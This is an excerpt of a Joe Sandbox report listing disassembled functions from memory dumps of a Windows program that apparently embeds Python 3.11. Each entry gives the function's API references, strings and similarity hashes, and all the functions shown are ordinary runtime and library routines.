Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: Name::operator+
String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
API String ID: 2943138195-757766384
Opcode ID: e51d893b916fd38dc1e020bc8963aa6f83aa847b46c3d095f24d6897074767ca
Instruction ID: 43777df5d2ff3aba63a2cf805add888c670e36c8aaba75d4cadcd66529f95497
Opcode Fuzzy Hash: e51d893b916fd38dc1e020bc8963aa6f83aa847b46c3d095f24d6897074767ca
Instruction Fuzzy Hash: C7717D76B08E5288E7348F1699510BD67A0BB08B94F4445F7DA5E43A78DF3CE670C704

Function 00007FFDFF19B304 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 156COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19B3E4

Part of subcall function 00007FFDFF1987EC: DName::operator+.LIBVCRUNTIME ref: 00007FFDFF198C99
Part of subcall function 00007FFDFF1987EC: DName::operator+.LIBVCRUNTIME ref: 00007FFDFF198CD1

Strings

std::nullptr_t, xrefs: 00007FFDFF19B4BA
std::nullptr_t , xrefs: 00007FFDFF19B48E
volatile, xrefs: 00007FFDFF19B376, 00007FFDFF19B509
volatile , xrefs: 00007FFDFF19B367, 00007FFDFF19B4FA

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Name::operator+
String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
API String ID: 2943138195-757766384
Opcode ID: 2022a5a444bb21080816af0d46441925073db637e58fa5fb142b52d3b2aac096
Instruction ID: bdeac381f19c793bf121575361cfbf68b291c87d6d2cee7ee41f39235d794daf
Opcode Fuzzy Hash: 2022a5a444bb21080816af0d46441925073db637e58fa5fb142b52d3b2aac096
Instruction Fuzzy Hash: C7711762F08A0684E734CF2598649BC67A4BB45788F845739CA7D93AEDDF3DA3508780

Function 00007FFE1A4938D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A4969C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4925CE), ref: 00007FFE1A4969CE

EncodePointer.KERNEL32 ref: 00007FFE1A49391C
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE1A49396B
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A493AE3

Strings

MOC, xrefs: 00007FFE1A493930
RCC, xrefs: 00007FFE1A493939

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: 227e5baf7e5e9155f58c31c3fecc157e2e687fbe3eaaf077a93d355b17988fc2
Instruction ID: de54a22374b29677aefac0ea9d896ebf40fab9b886f198351f3417ad610b17e4
Opcode Fuzzy Hash: 227e5baf7e5e9155f58c31c3fecc157e2e687fbe3eaaf077a93d355b17988fc2
Instruction Fuzzy Hash: F0612B32B08B458AE7308F66D4403BD77A0F749B98F1452AADE4E17BA9CF78E165C700

Function 00007FFDFF19CAA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFDFF19CB99

Strings

`template-parameter, xrefs: 00007FFDFF19CBA7
void, xrefs: 00007FFDFF19CAEA

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: NameName::
String ID: `template-parameter$void
API String ID: 1333004437-4057429177
Opcode ID: 48815828e915a994b8971b19c2f099341df2587ccb3d74520224cc3d3250014b
Instruction ID: 486165f1a9fe01cbad4241987f3f1a476b38aa6cfb259ecd3efcccfb86d9dfc9
Opcode Fuzzy Hash: 48815828e915a994b8971b19c2f099341df2587ccb3d74520224cc3d3250014b
Instruction Fuzzy Hash: DE415E22F18A5688FB208F64D8616FC23B1BB44788F941235CE7D5779DDF789605C380

Function 00007FF6399B2300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6399B2338
DialogBoxIndirectParamW.USER32 ref: 00007FF6399B23FE
DeleteObject.GDI32 ref: 00007FF6399B2431
DestroyIcon.USER32 ref: 00007FF6399B2443

Strings

Unhandled exception in script, xrefs: 00007FF6399B2368

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: a6e7d290dc67b0bb036b84f18c740492a81528deb91c8b42bdc3829a80364304
Instruction ID: cbaf5964c2b4139f0680a1699e72caa7d2f2fa6da66d69b672354178729cdca2
Opcode Fuzzy Hash: a6e7d290dc67b0bb036b84f18c740492a81528deb91c8b42bdc3829a80364304
Instruction Fuzzy Hash: CE315432A0968289EB20EF61E8552F97361FF89784F480135EA4D8BB9EDF3CD144DB00

Function 00007FF6399B2760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6399B86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6399B3FA4,00000000,00007FF6399B1925), ref: 00007FF6399B86E9

MessageBoxW.USER32 ref: 00007FF6399B283B
MessageBoxA.USER32 ref: 00007FF6399B284F

Strings

Error, xrefs: 00007FF6399B282C
Error/warning (ANSI fallback), xrefs: 00007FF6399B2843
%s%s: %s, xrefs: 00007FF6399B27EC

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
API String ID: 1878133881-640379615
Opcode ID: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
Instruction ID: 1ac101d0c203c0f0ee4e8647d6ea34baa88638c2cf30ff0367ecb9b73be292d2
Opcode Fuzzy Hash: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
Instruction Fuzzy Hash: E3216072A28A8681E6209F10F4917EA6365FF84784F440036EA8D837DEDF3CD645DF40

Function 00007FFDFF1FB9AC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00007FFDFF1FD348), ref: 00007FFDFF1FB9D1
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00007FFDFF1FD348), ref: 00007FFDFF1FB9DD
CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,?,00007FFDFF1FD348), ref: 00007FFDFF1FBA0F
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00007FFDFF1FD348), ref: 00007FFDFF1FBA30

Strings

CONOUT$, xrefs: 00007FFDFF1FB9FB

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: ConsoleWrite$CreateErrorFileLast
String ID: CONOUT$
API String ID: 10423688-3130406586
Opcode ID: 76c0690a5f38e3fb71933b36578f39f0dd72d46225f44c5a2372f432d89c7dff
Instruction ID: 5e86dee54450da8e71971c80a6e3be2d15ea04a3b05fca74977a1a4c96459b62
Opcode Fuzzy Hash: 76c0690a5f38e3fb71933b36578f39f0dd72d46225f44c5a2372f432d89c7dff
Instruction Fuzzy Hash: BE118E32B18A8292E7608F55E420B697360FB88B98F144235EABDC7798DF3DD854CB04

Function 00007FFDFF169EF4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0 ref: 00007FFDFF169F19
FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0 ref: 00007FFDFF169F37
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0 ref: 00007FFDFF1ADCF1

Strings

mscoree.dll, xrefs: 00007FFDFF169F10
CorExitProcess, xrefs: 00007FFDFF1ADCEA

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: ebdc5ce941ada3ee0bdb9d3a4bad7befffe03455e032320c07659f8200b1bd67
Instruction ID: 332406169f3b7c79e30275f66f411f7337815b28bbfbe583f8bb26a3acb22393
Opcode Fuzzy Hash: ebdc5ce941ada3ee0bdb9d3a4bad7befffe03455e032320c07659f8200b1bd67
Instruction Fuzzy Hash: FCF08162F18A0692FB244B24A434B396760EF94765F910335C97EC51ECDF3CD544C244

Function 00007FF6399C8DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6399C8DC5
GetProcAddress.KERNEL32 ref: 00007FF6399C8DDB
FreeLibrary.KERNEL32 ref: 00007FF6399C8E02

Strings

CorExitProcess, xrefs: 00007FF6399C8DD4
mscoree.dll, xrefs: 00007FF6399C8DBC

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
Instruction ID: bd442139d12027af41234eff1224d6e8efdc2ca9556a65d28593d80223d23157
Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
Instruction Fuzzy Hash: 5FF06231A1970782EA108F25E8843795322AF49BA1F5C1635C56D867F9CF2CD089EF10

Function 00007FFE14634088 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

_Py_BuildValue_SizeT.PYTHON311(?,?,?,00007FFE14633320), ref: 00007FFE1463409E
PyErr_SetObject.PYTHON311(?,?,?,00007FFE14633320), ref: 00007FFE146340B6
_Py_Dealloc.PYTHON311(?,?,?,00007FFE14633320), ref: 00007FFE146340C5

Strings

host not found, xrefs: 00007FFE14634090
(is), xrefs: 00007FFE14634097

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: BuildDeallocErr_ObjectSizeValue_
String ID: (is)$host not found
API String ID: 3413694139-3306034047
Opcode ID: 40dd804683fed52d173e9af2f9a1aa8debd6ed98485109b5513a4460bce29ed2
Instruction ID: 0394f501db8a66a9302324735603a7441c221610e3bdde281c23a9c7a70277be
Opcode Fuzzy Hash: 40dd804683fed52d173e9af2f9a1aa8debd6ed98485109b5513a4460bce29ed2
Instruction Fuzzy Hash: C5E0ED61F05E8781EE158B63A8D40B523E0AF4AB78B0444B5C90E4B375EF3CE84D8390

Function 00007FFDFF1C90C4 Relevance: 7.8, APIs: 5, Instructions: 345COMMON

Download Yara Rule

APIs

GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00007FFDFF1C918E
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00007FFDFF1C92AD
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00007FFDFF1C93BF
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00007FFDFF1C9447
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00007FFDFF1C951B

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Info
String ID:
API String ID: 1775632426-0
Opcode ID: a536099994c9a02e280a6c8b47aea5c77f07511dcf346a44e520efcc36e6ff81
Instruction ID: b34d0e73628adeeecc87ae6ea43f68bec2a7306553b1347bfadaae6fc621067a
Opcode Fuzzy Hash: a536099994c9a02e280a6c8b47aea5c77f07511dcf346a44e520efcc36e6ff81
Instruction Fuzzy Hash: 7DD19A63F0868285FB745E2480B5ABD6B93AF40BA4FD45336D97D06ACDDF2DE8808601

Function 00007FFDFF1515FC Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 136COMMON

Download Yara Rule

APIs

MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,?,?,?,?,00007FFDFF151538), ref: 00007FFDFF151675
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,?,?,?,?,00007FFDFF151538), ref: 00007FFDFF1516D8

Strings

*, xrefs: 00007FFDFF1516AF
*, xrefs: 00007FFDFF15164B

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: *$*
API String ID: 626452242-3771216468
Opcode ID: 4c7eb9a8f46dd6872076826cf0e70afbeeb641dcb011120a0e158aac90409ae9
Instruction ID: 5b54c5a850c6d5a808b7031c61355c8023a098b4611dfcd0e2c1e7ba973f0984
Opcode Fuzzy Hash: 4c7eb9a8f46dd6872076826cf0e70afbeeb641dcb011120a0e158aac90409ae9
Instruction Fuzzy Hash: FD516717F0874252FB769A5891F0C3C63A1AB54780F6C0336D97C26AEEDF7CA9A14602

Function 00007FFDFF199F8C Relevance: 7.6, APIs: 5, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFDFF19A031
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19A041
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19A05E
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19A093
DName::operator+=.LIBVCRUNTIME ref: 00007FFDFF19A0C6

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator+=
String ID:
API String ID: 3617985574-0
Opcode ID: 5ffdb6ed48908085d5ba10a4c7ed4073b2fe41deb7b026444fec5de35eaa1ee2
Instruction ID: 566a18f6635b95156870dd331343e7bb829efd83e9525f4fd98c96b73d88db2a
Opcode Fuzzy Hash: 5ffdb6ed48908085d5ba10a4c7ed4073b2fe41deb7b026444fec5de35eaa1ee2
Instruction Fuzzy Hash: D3514A73F18A5289E7208F24E860BAC37A1BB85B48F589231CA3D477DDDF3AA544C740

Function 00007FFDFF176F64 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FFDFF151D7A), ref: 00007FFDFF176FCA
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FFDFF151D7A), ref: 00007FFDFF176FF7
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FFDFF151D7A), ref: 00007FFDFF177043
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FFDFF151D7A), ref: 00007FFDFF1B0444

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: FullNamePath$ErrorLast
String ID:
API String ID: 457693415-0
Opcode ID: dc72bab200eeb4bf266553590a667a6b32545a3f179e38c6d8f04e2bdb351393
Instruction ID: 9b9ce73cf822520aedc0546b2421ac6f5f39f0d760eef19449bd9ed9c9915072
Opcode Fuzzy Hash: dc72bab200eeb4bf266553590a667a6b32545a3f179e38c6d8f04e2bdb351393
Instruction Fuzzy Hash: 2D316B23F08B5285FB119B65A8208BD23A4AF65B90F144235DE7DA3BDADF39E8058354

Function 00007FFDFF155E40 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,00000000,00007FFDFF174E4F,?,?,?,00007FFDFF1B0581,?,?,?,00007FFDFF1A516F), ref: 00007FFDFF155EDC

Part of subcall function 00007FFDFF1CCA50: IsProcessorFeaturePresent.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-1 ref: 00007FFDFF1CCA8F

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: FeaturePresentProcessorValue
String ID:
API String ID: 502995040-0
Opcode ID: a5df8222c16b396bc638ef60a8566040b9d9b486726630a612cf969d44ca3275
Instruction ID: 02860520923039a34b3c337d584f14a0deec9d4543a8196afe9f55f145733d50
Opcode Fuzzy Hash: a5df8222c16b396bc638ef60a8566040b9d9b486726630a612cf969d44ca3275
Instruction Fuzzy Hash: 0F416B26F0CA4385FB548B20A870A782395AF85BA4F584335D93EC67EEEF6CE5458700

Function 00007FFDFF199B28 Relevance: 7.6, APIs: 5, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFDFF199BA1
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF199BC3
DName::DName.LIBVCRUNTIME ref: 00007FFDFF199BD6
DName::DName.LIBVCRUNTIME ref: 00007FFDFF199C0D
DName::DName.LIBVCRUNTIME ref: 00007FFDFF199C18

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: NameName::$Name::operator+
String ID:
API String ID: 826178784-0
Opcode ID: 2100dca59a6d779d2933ec84a8fd741350697e2bca65763dff7fe953809c00a6
Instruction ID: 95dbab0c8462c732b1a1041e000842141bb23da4ca6ec3dac35b3e698faf762a
Opcode Fuzzy Hash: 2100dca59a6d779d2933ec84a8fd741350697e2bca65763dff7fe953809c00a6
Instruction Fuzzy Hash: 9D414C63F08A5695E720CF21E8A09B833B4BB55B88B944231DA7E533DDDF3DE6158340

Function 00007FFE1A49A340 Relevance: 7.6, APIs: 5, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFE1A49A3B9
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49A3DB
DName::DName.LIBVCRUNTIME ref: 00007FFE1A49A3EA
DName::DName.LIBVCRUNTIME ref: 00007FFE1A49A421
DName::DName.LIBVCRUNTIME ref: 00007FFE1A49A42C

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: NameName::$Name::operator+
String ID:
API String ID: 826178784-0
Opcode ID: bce8ca39c1d4cdf7971423a01a1e8e868c385637c9e3d3eec5322708e8c4e6dd
Instruction ID: 9653639d75da3527068d4382fd5d52227dc87643c23f2ed58600c5aec47df30a
Opcode Fuzzy Hash: bce8ca39c1d4cdf7971423a01a1e8e868c385637c9e3d3eec5322708e8c4e6dd
